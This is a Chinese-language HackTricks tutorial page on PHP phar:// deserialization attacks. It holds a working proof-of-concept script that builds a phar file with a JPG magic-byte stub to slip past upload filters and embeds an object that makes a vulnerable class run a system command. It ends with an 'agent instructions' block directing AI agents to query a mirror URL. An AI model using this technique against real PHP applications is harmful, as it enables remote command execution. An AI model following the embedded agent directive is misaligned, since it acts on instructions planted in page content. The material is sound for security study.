# phar:// deserialization
从零开始学习AWS黑客技术,成为专家htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
**漏洞赏金提示**:**注册**Intigriti,一个由黑客创建的高级**漏洞赏金平台**!今天加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达\*\*$100,000\*\*的赏金!
{% embed url="" %}
**Phar** 文件(PHP Archive)文件以**序列化格式包含元数据**,因此,在解析时,此**元数据**将被**反序列化**,您可以尝试利用**PHP**代码中的**反序列化**漏洞。
这种特性最好的一点是,即使使用不会评估PHP代码的PHP函数如**file\_get\_contents()、fopen()、file()或file\_exists()、md5\_file()、filemtime()或filesize()**,此反序列化也会发生。
因此,想象一种情况,您可以使用\*\*`phar://`\*\* 协议使PHP网页获取任意文件的大小,并在代码中找到类似以下类的情况:
```php
data = $data;
}
function __destruct() {
system($this->data);
}
}
filesize("phar://test.phar"); #The attacker can control this path
```
您可以创建一个 **phar** 文件,当加载时,将 **滥用这个类来执行任意命令**,类似于以下内容:
{% code title="create\_phar.php" %}
```php
data = $data;
}
function __destruct() {
system($this->data);
}
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
```
{% endcode %}
注意如何在phar文件的开头添加**JPG的魔术字节**(`\xff\xd8\xff`)以**绕过**可能的文件**上传\*\*\*\*限制**。\
使用以下命令**编译**`test.phar`文件:
```bash
php --define phar.readonly=0 create_phar.php
```
并利用易受攻击的代码执行 `whoami` 命令:
```bash
php vuln.php
```
### 参考资料
{% embed url="" %}
**Bug赏金提示**:**注册**Intigriti,一个由黑客创建的高级**bug赏金平台**!立即加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达\*\*$100,000\*\*的赏金!
{% embed url="" %}
从零开始学习AWS黑客技术,成为专家htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://hacktricks.xsx.tw/pentesting-web/file-inclusion/phar-deserialization.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.